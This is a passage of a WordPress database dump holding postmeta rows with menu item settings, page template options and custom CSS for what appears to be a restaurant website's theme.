grid_id\";a:0:{}}'),(51135,4222,'_menu_item_icon','null'),(51136,4223,'_menu_item_type','post_type'),(51137,4223,'_menu_item_menu_item_parent','3993'),(51138,4223,'_menu_item_object_id','2625'),(51139,4223,'_menu_item_object','page'),(51140,4223,'_menu_item_target',''),(51141,4223,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51142,4223,'_menu_item_xfn',''),(51143,4223,'_menu_item_url',''),(51144,4223,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(51145,4223,'_menu_item_icon','null'),(51146,4224,'_menu_item_type','post_type'),(51147,4224,'_menu_item_menu_item_parent','4032'),(51148,4224,'_menu_item_object_id','2627'),(51149,4224,'_menu_item_object','page'),(51150,4224,'_menu_item_target',''),(51151,4224,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51152,4224,'_menu_item_xfn',''),(51153,4224,'_menu_item_url',''),(51154,4224,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(51155,4225,'_menu_item_type','post_type'),(51156,4225,'_menu_item_menu_item_parent','4032'),(51157,4225,'_menu_item_object_id','2625'),(51158,4225,'_menu_item_object','page'),(51159,4225,'_menu_item_target',''),(51160,4225,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51161,4225,'_menu_item_xfn',''),(51162,4225,'_menu_item_url',''),(51163,4225,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(51164,4226,'_menu_item_type','post_type'),(51165,4226,'_menu_item_menu_item_parent','3997'),(51166,4226,'_menu_item_object_id','2627'),(51167,4226,'_menu_item_object','page'),(51168,4226,'_menu_item_target',''),(51169,4226,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51170,4226,'_menu_item_xfn',''),(51171,4226,'_menu_item_url',''),(51172,4226,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(51173,4227,'_menu_item_type','post_type'),(51174,4227,'_menu_item_menu_item_parent','3997'),(51175,4227,'_menu_item_object_id','2625'),(51176,4227,'_menu_item_object','page'),(51177,4227,'_menu_item_target',''),(51178,4227,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51179,4227,'_menu_item_xfn',''),(51180,4227,'_menu_item_url',''),(51181,4227,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(51182,4227,'_menu_item_icon','null'),(51183,4228,'_menu_item_type','post_type'),(51184,4228,'_menu_item_menu_item_parent','4033'),(51185,4228,'_menu_item_object_id','3065'),(51186,4228,'_menu_item_object','page'),(51187,4228,'_menu_item_target',''),(51188,4228,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51189,4228,'_menu_item_xfn',''),(51190,4228,'_menu_item_url',''),(51191,4228,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(51192,4228,'_menu_item_icon','null'),(51193,4229,'_menu_item_type','post_type'),(51194,4229,'_menu_item_menu_item_parent','4033'),(51195,4229,'_menu_item_object_id','3067'),(51196,4229,'_menu_item_object','page'),(51197,4229,'_menu_item_target',''),(51198,4229,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51199,4229,'_menu_item_xfn',''),(51200,4229,'_menu_item_url',''),(51201,4229,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(51202,4229,'_menu_item_icon','null'),(51203,4230,'_menu_item_type','post_type'),(51204,4230,'_menu_item_menu_item_parent','4033'),(51205,4230,'_menu_item_object_id','3066'),(51206,4230,'_menu_item_object','page'),(51207,4230,'_menu_item_target',''),(51208,4230,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51209,4230,'_menu_item_xfn',''),(51210,4230,'_menu_item_url',''),(51211,4230,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(51212,4230,'_menu_item_icon','null'),(51213,4231,'_menu_item_type','post_type'),(51214,4231,'_menu_item_menu_item_parent','4030'),(51215,4231,'_menu_item_object_id','2646'),(51216,4231,'_menu_item_object','page'),(51217,4231,'_menu_item_target',''),(51218,4231,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51219,4231,'_menu_item_xfn',''),(51220,4231,'_menu_item_url',''),(51221,4231,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(51222,4231,'_menu_item_icon','null'),(51223,4232,'_menu_item_type','post_type'),(51224,4232,'_menu_item_menu_item_parent','4033'),(51225,4232,'_menu_item_object_id','2646'),(51226,4232,'_menu_item_object','page'),(51227,4232,'_menu_item_target',''),(51228,4232,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51229,4232,'_menu_item_xfn',''),(51230,4232,'_menu_item_url',''),(51231,4232,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(51232,4232,'_menu_item_icon','null'),(51233,4233,'_menu_item_type','post_type'),(51234,4233,'_menu_item_menu_item_parent','3995'),(51235,4233,'_menu_item_object_id','2652'),(51236,4233,'_menu_item_object','page'),(51237,4233,'_menu_item_target',''),(51238,4233,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51239,4233,'_menu_item_xfn',''),(51240,4233,'_menu_item_url',''),(51241,4233,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(51242,4233,'_menu_item_icon','null'),(51243,4234,'_menu_item_type','post_type'),(51244,4234,'_menu_item_menu_item_parent','3989'),(51245,4234,'_menu_item_object_id','2652'),(51246,4234,'_menu_item_object','page'),(51247,4234,'_menu_item_target',''),(51248,4234,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51249,4234,'_menu_item_xfn',''),(51250,4234,'_menu_item_url',''),(51251,4234,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(51252,4234,'_menu_item_icon','null'),(51253,4235,'_menu_item_type','post_type'),(51254,4235,'_menu_item_menu_item_parent','4030'),(51255,4235,'_menu_item_object_id','2843'),(51256,4235,'_menu_item_object','page'),(51257,4235,'_menu_item_target',''),(51258,4235,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51259,4235,'_menu_item_xfn',''),(51260,4235,'_menu_item_url',''),(51261,4235,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(51262,4235,'_menu_item_icon','null'),(51263,4236,'_menu_item_type','post_type'),(51264,4236,'_menu_item_menu_item_parent','4033'),(51265,4236,'_menu_item_object_id','2843'),(51266,4236,'_menu_item_object','page'),(51267,4236,'_menu_item_target',''),(51268,4236,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51269,4236,'_menu_item_xfn',''),(51270,4236,'_menu_item_url',''),(51271,4236,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(51272,4236,'_menu_item_icon','null'),(51273,4237,'_menu_item_type','post_type'),(51274,4237,'_menu_item_menu_item_parent','4030'),(51275,4237,'_menu_item_object_id','2857'),(51276,4237,'_menu_item_object','page'),(51277,4237,'_menu_item_target',''),(51278,4237,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51279,4237,'_menu_item_xfn',''),(51280,4237,'_menu_item_url',''),(51281,4237,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(51282,4237,'_menu_item_icon','null'),(51283,4238,'_menu_item_type','post_type'),(51284,4238,'_menu_item_menu_item_parent','4033'),(51285,4238,'_menu_item_object_id','2857'),(51286,4238,'_menu_item_object','page'),(51287,4238,'_menu_item_target',''),(51288,4238,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51289,4238,'_menu_item_xfn',''),(51290,4238,'_menu_item_url',''),(51291,4238,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(51292,4238,'_menu_item_icon','null'),(52332,4379,'_menu_item_menu_item_parent','4353'),(52333,4379,'_menu_item_object_id','4379'),(52334,4379,'_menu_item_object','custom'),(52335,4379,'_menu_item_target',''),(52336,4379,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52337,4379,'_menu_item_xfn',''),(52338,4379,'_menu_item_url','#'),(52339,4379,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52340,4379,'_menu_item_icon','null'),(52341,4380,'_menu_item_type','custom'),(52342,4380,'_menu_item_menu_item_parent','4353'),(52343,4380,'_menu_item_object_id','4380'),(52344,4380,'_menu_item_object','custom'),(52345,4380,'_menu_item_target',''),(52346,4380,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52347,4380,'_menu_item_xfn',''),(52348,4380,'_menu_item_url','#'),(52349,4380,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52350,4380,'_menu_item_icon','null'),(52351,4381,'_menu_item_type','custom'),(52352,4381,'_menu_item_menu_item_parent','4359'),(52353,4381,'_menu_item_object_id','4381'),(52354,4381,'_menu_item_object','custom'),(52355,4381,'_menu_item_target',''),(52356,4381,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52357,4381,'_menu_item_xfn',''),(52358,4381,'_menu_item_url','#'),(52359,4381,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52360,4381,'_menu_item_icon','null'),(52361,4382,'_menu_item_type','custom'),(52362,4382,'_menu_item_menu_item_parent','4359'),(52363,4382,'_menu_item_object_id','4382'),(52364,4382,'_menu_item_object','custom'),(52365,4382,'_menu_item_target',''),(52366,4382,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52367,4382,'_menu_item_xfn',''),(52368,4382,'_menu_item_url','#'),(52369,4382,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52370,4382,'_menu_item_icon','null'),(52371,4383,'_menu_item_type','custom'),(52372,4383,'_menu_item_menu_item_parent','4359'),(52373,4383,'_menu_item_object_id','4383'),(52374,4383,'_menu_item_object','custom'),(52375,4383,'_menu_item_target',''),(52376,4383,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52377,4383,'_menu_item_xfn',''),(52378,4383,'_menu_item_url','#'),(52379,4383,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52380,4383,'_menu_item_icon','null'),(52381,4384,'_menu_item_type','custom'),(52382,4384,'_menu_item_menu_item_parent','4359'),(52383,4384,'_menu_item_object_id','4384'),(52384,4384,'_menu_item_object','custom'),(52385,4384,'_menu_item_target',''),(52386,4384,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52387,4384,'_menu_item_xfn',''),(52388,4384,'_menu_item_url','#'),(52389,4384,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52390,4384,'_menu_item_icon','null'),(52391,4385,'_menu_item_type','custom'),(52392,4385,'_menu_item_menu_item_parent','4352'),(52393,4385,'_menu_item_object_id','4385'),(52394,4385,'_menu_item_object','custom'),(52395,4385,'_menu_item_target',''),(52396,4385,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52397,4385,'_menu_item_xfn',''),(52398,4385,'_menu_item_url','#'),(52399,4385,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52400,4385,'_menu_item_icon','null'),(52401,4386,'_menu_item_type','custom'),(52402,4386,'_menu_item_menu_item_parent','4358'),(52403,4386,'_menu_item_object_id','4386'),(52404,4386,'_menu_item_object','custom'),(52405,4386,'_menu_item_target',''),(52406,4386,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52407,4386,'_menu_item_xfn',''),(52408,4386,'_menu_item_url','#'),(52409,4386,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52410,4386,'_menu_item_icon','null'),(52411,4387,'_menu_item_type','custom'),(52412,4387,'_menu_item_menu_item_parent','4350'),(52413,4387,'_menu_item_object_id','4387'),(52414,4387,'_menu_item_object','custom'),(52415,4387,'_menu_item_target',''),(52416,4387,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52417,4387,'_menu_item_xfn',''),(52418,4387,'_menu_item_url','#'),(52419,4387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52420,4387,'_menu_item_icon','null'),(52421,4388,'_menu_item_type','custom'),(52422,4388,'_menu_item_menu_item_parent','4356'),(52423,4388,'_menu_item_object_id','4388'),(52424,4388,'_menu_item_object','custom'),(52425,4388,'_menu_item_target',''),(52426,4388,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52427,4388,'_menu_item_xfn',''),(52428,4388,'_menu_item_url','#'),(52429,4388,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52430,4388,'_menu_item_icon','null'),(52431,4389,'_menu_item_type','custom'),(52432,4389,'_menu_item_menu_item_parent','4352'),(52433,4389,'_menu_item_object_id','4389'),(52434,4389,'_menu_item_object','custom'),(52435,4389,'_menu_item_target',''),(52436,4389,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52437,4389,'_menu_item_xfn',''),(52438,4389,'_menu_item_url','#'),(52439,4389,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52440,4389,'_menu_item_icon','null'),(52441,4390,'_menu_item_type','custom'),(52442,4390,'_menu_item_menu_item_parent','4352'),(52443,4390,'_menu_item_object_id','4390'),(52444,4390,'_menu_item_object','custom'),(52445,4390,'_menu_item_target',''),(52446,4390,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52447,4390,'_menu_item_xfn',''),(52448,4390,'_menu_item_url','#'),(52449,4390,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52450,4390,'_menu_item_icon','null'),(52451,4391,'_menu_item_type','custom'),(52452,4391,'_menu_item_menu_item_parent','0'),(52453,4391,'_menu_item_object_id','4391'),(52454,4391,'_menu_item_object','custom'),(52455,4391,'_menu_item_target',''),(52456,4391,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52457,4391,'_menu_item_xfn',''),(52458,4391,'_menu_item_url','#'),(52459,4391,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52460,4392,'_menu_item_type','custom'),(52461,4392,'_menu_item_menu_item_parent','4356'),(52462,4392,'_menu_item_object_id','4392'),(52463,4392,'_menu_item_object','custom'),(52464,4392,'_menu_item_target',''),(52465,4392,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52466,4392,'_menu_item_xfn',''),(52467,4392,'_menu_item_url','#'),(52468,4392,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52469,4392,'_menu_item_icon','null'),(52470,4393,'_menu_item_type','custom'),(52471,4393,'_menu_item_menu_item_parent','4356'),(52472,4393,'_menu_item_object_id','4393'),(52473,4393,'_menu_item_object','custom'),(52474,4393,'_menu_item_target',''),(52475,4393,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52476,4393,'_menu_item_xfn',''),(52477,4393,'_menu_item_url','#'),(52478,4393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52479,4393,'_menu_item_icon','null'),(52480,2,'_wp_page_template','default'),(52481,3,'_wp_page_template','default'),(52482,3034,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52483,3034,'_wp_page_template','default'),(52484,3034,'slide_template','default'),(52485,3034,'_wpb_vc_js_status','false'),(52486,3034,'mkdf_page_content_behind_header_meta','no'),(52487,3034,'mkdf_disable_vertical_header_background_image_meta','no'),(52488,3034,'mkdf_disable_header_widget_areas_meta','no'),(52489,3034,'mkdf_title_area_type_meta','attika'),(52490,3034,'mkdf_header_type_meta','header-divided'),(52491,3034,'mkdf_header_behaviour_meta','no-behavior'),(52492,3034,'mkdf_menu_area_background_color_meta','#ffffff'),(52493,3034,'mkdf_sidebar_layout_meta','sidebar-25-right'),(52494,3034,'mkdf_custom_sidebar_area_meta','shop-sidebar'),(52495,3034,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(52496,3034,'mkdf_page_content_padding','70px 0 100px'),(52497,3035,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52498,3035,'_wp_page_template','default'),(52499,3035,'slide_template','default'),(52500,3035,'_wpb_vc_js_status','false'),(52501,3035,'mkdf_page_content_behind_header_meta','no'),(52502,3035,'mkdf_disable_vertical_header_background_image_meta','no'),(52503,3035,'mkdf_disable_header_widget_areas_meta','no'),(52504,3035,'mkdf_title_area_type_meta','attika'),(52505,3035,'mkdf_page_content_padding','100px 0'),(52506,3035,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(52507,3035,'mkdf_menu_area_background_color_meta','#ffffff'),(52508,3036,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52509,3036,'_wp_page_template','default'),(52510,3036,'slide_template','default'),(52511,3036,'_wpb_vc_js_status','false'),(52512,3036,'mkdf_page_content_behind_header_meta','no'),(52513,3036,'mkdf_disable_vertical_header_background_image_meta','no'),(52514,3036,'mkdf_disable_header_widget_areas_meta','no'),(52515,3036,'mkdf_title_area_type_meta','attika'),(52516,3036,'mkdf_menu_area_background_color_meta','#ffffff'),(52517,3036,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(52518,3036,'mkdf_page_content_padding','85px 0 30px'),(52519,3037,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52520,3037,'_wp_page_template','default'),(52521,3037,'slide_template','default'),(52522,3037,'_wpb_vc_js_status','false'),(52523,3037,'mkdf_page_content_behind_header_meta','no'),(52524,3037,'mkdf_disable_vertical_header_background_image_meta','no'),(52525,3037,'mkdf_disable_header_widget_areas_meta','no'),(52526,3037,'mkdf_title_area_type_meta','attika'),(52527,3037,'mkdf_menu_area_background_color_meta','#ffffff'),(52528,3037,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(52529,3037,'mkdf_page_content_padding','120px 0px 86px 0px'),(52530,3038,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52531,3038,'_wp_page_template','full-width.php'),(52532,3038,'slide_template','default'),(52533,3038,'_wpb_vc_js_status','true'),(52534,3038,'mkdf_page_content_behind_header_meta','no'),(52535,3038,'mkdf_disable_vertical_header_background_image_meta','no'),(52536,3038,'mkdf_disable_header_widget_areas_meta','no'),(52537,3038,'mkdf_page_content_padding','80px 0 110px'),(52538,3039,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52539,3039,'_wp_page_template','full-width.php'),(52540,3039,'slide_template','default'),(52541,3039,'_wpb_vc_js_status','false'),(52542,3039,'mkdf_page_content_behind_header_meta','no'),(52543,3039,'mkdf_disable_vertical_header_background_image_meta','no'),(52544,3039,'mkdf_disable_header_widget_areas_meta','no'),(52545,3040,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52546,3040,'_wp_page_template','full-width.php'),(52547,3040,'slide_template','default'),(52548,3040,'_wpb_vc_js_status','true'),(52549,3040,'mkdf_page_content_behind_header_meta','no'),(52550,3040,'mkdf_page_content_padding','100px 0 0 0'),(52551,3040,'mkdf_page_content_padding_mobile','100px 0 0 0'),(52552,3040,'mkdf_header_type_meta','header-divided'),(52553,3040,'mkdf_disable_vertical_header_background_image_meta','no'),(52554,3040,'mkdf_disable_header_widget_areas_meta','no'),(52555,3040,'mkdf_show_title_area_meta','no'),(52556,3040,'_wpb_shortcodes_custom_css','.vc_custom_1534503338704{padding-top: 150px !important;}.vc_custom_1536913540691{padding-top: 130px !important;}.vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}.vc_custom_1533133353763{padding-top: 100px !important;}.vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}.vc_custom_1534502044211{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1533132683543{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1533736057368{margin-top: -375px !important;}.vc_custom_1533739073010{margin-top: -60px !important;}.vc_custom_1536047365110{margin-top: -160px !important;}.vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}.vc_custom_1535119322528{margin-top: -20px !important;}.vc_custom_1533811367372{margin-top: -306px !important;}.vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}.vc_custom_1533809912373{margin-top: -86px !important;}.vc_custom_1533811471107{margin-top: -336px !important;}.vc_custom_1533812953034{margin-top: -123px !important;}.vc_custom_1537280521172{padding-top: 13% !important;padding-bottom: 13% !important;}.vc_custom_1534769660562{margin-top: -190px !important;}.vc_custom_1534769683015{margin-top: -374px !important;}.vc_custom_1534769891217{margin-left: -50px !important;}.vc_custom_1534769906135{margin-top: -62px !important;}.vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064623328{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064682800{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064749849{padding-right: 0px !important;padding-left: 0px !important;}'),(52557,3040,'mkdf_menu_area_background_color_meta','#f8f2ed'),(52558,3040,'mkdf_menu_area_height_meta','70px'),(52559,3040,'_wpb_post_custom_css','.main-home-first-row {\n    position: relative;\n    z-index: 10;\n}\n.main-home-second-row {\n    position: relative;\n    z-index: 20;\n}'),(52560,3040,'mkdf_header_behaviour_meta','sticky-header-on-scroll-up'),(52561,3040,'mkdf_custom_sticky_menu_area_sidebar_meta','custom-sticky'),(52562,3040,'mkdf_smooth_page_transitions_meta','yes'),(52563,3040,'mkdf_page_transition_preloader_meta','yes'),(52564,3040,'mkdf_smooth_pt_spinner_type_meta','pulse'),(52565,3040,'mkdf_smooth_pt_spinner_color_meta','#000000'),(52566,3041,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52567,3041,'_wp_page_template','full-width.php'),(52568,3041,'slide_template','default'),(52569,3041,'_wpb_vc_js_status','true'),(52570,3041,'mkdf_page_content_behind_header_meta','no'),(52571,3041,'mkdf_disable_vertical_header_background_image_meta','no'),(52572,3041,'mkdf_disable_header_widget_areas_meta','yes'),(52573,3041,'mkdf_page_content_padding','0'),(52574,3041,'_wpb_shortcodes_custom_css','.vc_custom_1535460622871{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534147387272{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1534152695378{padding-top: 65px !important;padding-bottom: 160px !important;}.vc_custom_1535985514307{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535461280310{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535459248703{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1533043384159{padding-top: 4px !important;}.vc_custom_1533043390970{padding-top: 4px !important;}.vc_custom_1533043398297{padding-top: 4px !important;}.vc_custom_1533043409686{padding-top: 4px !important;}.vc_custom_1533043430614{padding-top: 4px !important;}.vc_custom_1533027694804{margin-top: -120px !important;}.vc_custom_1533813662568{padding-top: 39% !important;padding-right: 31% !important;}.vc_custom_1534936187501{margin-top: -97px !important;padding-left: 12% !important;}.vc_custom_1533029626211{padding-top: 30px !important;}.vc_custom_1537283902655{margin-top: -125px !important;}.vc_custom_1536848053140{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534151757973{padding-right: 0px !important;}.vc_custom_1534151543242{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534150759198{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534151021205{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534163280454{padding-right: 0px !important;padding-left: 0px !important;}'),(52575,3041,'mkdf_show_title_area_meta','no'),(52576,3041,'mkdf_logo_image_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h2-logo-center-1png.png'),(52577,3041,'mkdf_logo_image_dark_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h2-logo-center-1png.png'),(52578,3041,'mkdf_logo_image_light_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h2-logo-center-1png.png'),(52579,3041,'mkdf_logo_image_sticky_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/logo.png'),(52580,3041,'mkdf_logo_image_mobile_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/logo.png'),(52581,3041,'_wpb_post_custom_css','.mkdf-page-header .mkdf-logo-area .mkdf-logo-wrapper a,\n.mkdf-page-header .mkdf-menu-area .mkdf-logo-wrapper a {\n    max-height: 125px;\n}\n\n@media only screen and (min-width: 1025px) {\n    .home-two-second-row,\n    .home-two-third-row {\n        display: none;\n    }\n}\n\n@media only screen and (max-width: 1024px) {\n    .home-two-first-row {\n        display: none;\n    }\n}'),(52582,3041,'mkdf_header_behaviour_meta','sticky-header-on-scroll-up'),(52583,3041,'mkdf_smooth_page_transitions_meta','yes'),(52584,3041,'mkdf_page_transition_preloader_meta','yes'),(52585,3041,'mkdf_smooth_pt_spinner_type_meta','pulse'),(52586,3041,'mkdf_smooth_pt_spinner_color_meta','#000000'),(52587,3042,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52588,3042,'_wp_page_template','full-width.php'),(52589,3042,'slide_template','default'),(52590,3042,'_wpb_vc_js_status','true'),(52591,3042,'mkdf_page_content_behind_header_meta','no'),(52592,3042,'mkdf_disable_vertical_header_background_image_meta','no'),(52593,3042,'mkdf_disable_header_widget_areas_meta','no'),(52594,3042,'_wpb_shortcodes_custom_css','.vc_custom_1535379851915{margin-bottom: -90px !important;padding-top: 80px !important;}.vc_custom_1537284312649{padding-top: 130px !important;padding-bottom: 130px !important;}.vc_custom_1534432930786{padding-top: 130px !important;padding-bottom: 130px !important;}.vc_custom_1534433450023{padding-top: 130px !important;padding-bottom: 130px !important;}.vc_custom_1535633159717{padding-bottom: 200px !important;}.vc_custom_1534515728554{margin-top: -90px !important;margin-bottom: -90px !important;}'),(52595,3042,'mkdf_page_content_padding','0'),(52596,3042,'mkdf_header_type_meta','header-bottom'),(52597,3042,'mkdf_show_title_area_meta','no'),(52598,3042,'mkdf_menu_area_side_padding_meta','30px'),(52599,3042,'mkdf_page_slider_meta','[rev_slider alias=\"seafood-restaurant\"]'),(52600,3043,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52601,3043,'_wp_page_template','full-width.php'),(52602,3043,'slide_template','default'),(52603,3043,'_wpb_vc_js_status','true'),(52604,3043,'mkdf_page_content_behind_header_meta','no'),(52605,3043,'mkdf_disable_vertical_header_background_image_meta','no'),(52606,3043,'mkdf_disable_header_widget_areas_meta','no'),(52607,3043,'mkdf_page_content_padding','0'),(52608,3043,'mkdf_header_type_meta','header-divided'),(52609,3043,'mkdf_show_title_area_meta','no'),(52610,3043,'mkdf_menu_area_background_color_meta','#ffffff'),(52611,3043,'mkdf_menu_area_background_transparency_meta','1'),(52612,3043,'mkdf_menu_area_height_meta','80'),(52613,3043,'mkdf_disable_footer_meta','yes'),(52614,3043,'mkdf_header_behaviour_meta','fixed-on-scroll'),(52615,3043,'_wpb_shortcodes_custom_css','.vc_custom_1533285714962{padding-right: 0px !important;padding-left: 0px !important;}'),(52616,3044,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52617,3044,'_wp_page_template','default'),(52618,3044,'slide_template','default'),(52619,3044,'_wpb_vc_js_status','false'),(52620,3044,'mkdf_page_content_behind_header_meta','no'),(52621,3044,'mkdf_disable_vertical_header_background_image_meta','no'),(52622,3044,'mkdf_disable_header_widget_areas_meta','no'),(52623,3044,'mkdf_show_title_area_meta','yes'),(52624,3044,'mkdf_title_area_type_meta','attika'),(52625,3044,'mkdf_menu_area_background_color_meta','#ffffff'),(52626,3044,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(52627,3044,'mkdf_page_content_padding','150px 0'),(52628,3045,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52629,3045,'_wp_page_template','full-width.php'),(52630,3045,'slide_template','default'),(52631,3045,'_wpb_vc_js_status','true'),(52632,3045,'mkdf_page_content_behind_header_meta','no'),(52633,3045,'mkdf_disable_vertical_header_background_image_meta','no'),(52634,3045,'mkdf_disable_header_widget_areas_meta','no'),(52635,3045,'mkdf_show_title_area_meta','yes'),(52636,3045,'mkdf_title_area_type_meta','attika'),(52637,3045,'mkdf_menu_area_background_color_meta','#ffffff'),(52638,3045,'_wpb_shortcodes_custom_css','.vc_custom_1535549530866{padding-top: 50px !important;padding-bottom: 120px !important;}'),(52639,3045,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(52640,3046,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52641,3046,'_wpb_shortcodes_custom_css','.vc_custom_1535549496113{padding-top: 50px !important;padding-bottom: 120px !important;}'),(52642,3046,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52643,3046,'_wp_page_template','full-width.php'),(52644,3046,'slide_template','default'),(52645,3046,'_wpb_vc_js_status','true'),(52646,3046,'mkdf_page_content_behind_header_meta','no'),(52647,3046,'mkdf_disable_vertical_header_background_image_meta','no'),(52648,3046,'mkdf_disable_header_widget_areas_meta','no'),(52649,3046,'mkdf_show_title_area_meta','yes'),(52650,3046,'mkdf_title_area_type_meta','attika'),(52651,3046,'mkdf_menu_area_background_color_meta','#ffffff'),(52652,3046,'_wpb_shortcodes_custom_css','.vc_custom_1535549496113{padding-top: 50px !important;padding-bottom: 120px 